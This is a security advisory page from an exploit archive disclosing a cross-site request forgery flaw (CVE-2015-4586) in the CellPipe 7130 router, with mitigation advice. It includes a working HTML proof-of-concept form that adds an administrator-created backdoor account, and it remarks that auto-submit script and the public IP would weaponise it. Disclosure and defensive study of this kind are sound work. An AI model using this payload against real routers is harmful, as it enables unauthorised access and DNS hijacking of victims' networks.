exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CellPipe 7130 Cross Site Request Forgery

CellPipe 7130 Cross Site Request Forgery
Posted Jun 16, 2015
Authored by Dionisia Lerataki

CellPipe 7130 router version 1.0.0.20h.HOL suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2015-4586
SHA-256 | b4208c80088ecfa773353853c2cf70171df70a35ad267695d22e5afeee28d344

CellPipe 7130 Cross Site Request Forgery

Change Mirror Download
CellPipe Router CSRF vulnerability

Device model : CellPipe 7130 RG 5Ae. M2013 HOL
*Software Version:* : *1.0.0.20h.HOL*
CWE: 352 - https://cwe.mitre.org/data/definitions/352.html
CVE: CVE-2015-4586
Date: 16/06/2015
Discovered by: DiLi


Vulnerability type: Multiple CSRF vulnerabilities in the router's web
interface

CSRF (Cross Site Request Forgery) is an attack which forces an end user to
execute unwanted actions on a web application in which he/she is currently
authenticated. It is currently included in the OWASP Top 10 project.

Exploitation and Impact:

The exploitation of the above vulnerabilities, in addition with a social
engineering
attack, may lead to :

• Unwanted service exposure
• DNS Hijacking
• Disabling wireless security
• User account creation

I have tested the scenario with the user account creation and the proof of
concept is the following:

<html>
<body>
<form action="http://192.168.1.1/password.cmd
<http://192.168.2.1/password.cmd>">
<input type="hidden" name="action" value="add_user" />
<input type="hidden" name="userAdd" value="csrf" />
<input type="hidden" name="pwdAdd" value="csrf" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

If a router administrator executes the above code a user with credentials
(csrf/csrf) will be added.
In our PoC the administrator must press the Submit request but in a real
attack scenario an attacker can implement an auto submit javascript code.

In our case the router IP address is: 192.168.1.1. Of course it can be
exploited with the router's public IP address.

Suggested mitigation:

In order to properly patch the CSRF vulnerability the following measures
have to be
taken:

• Add a randomly generated token associated with the user's session in order
to prevent a CSRF attack. Alternatively a check to the referer header can be
introduced. Although referer headers can be easily spoofed, they can
prevent a CSRF attack of this kind.
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close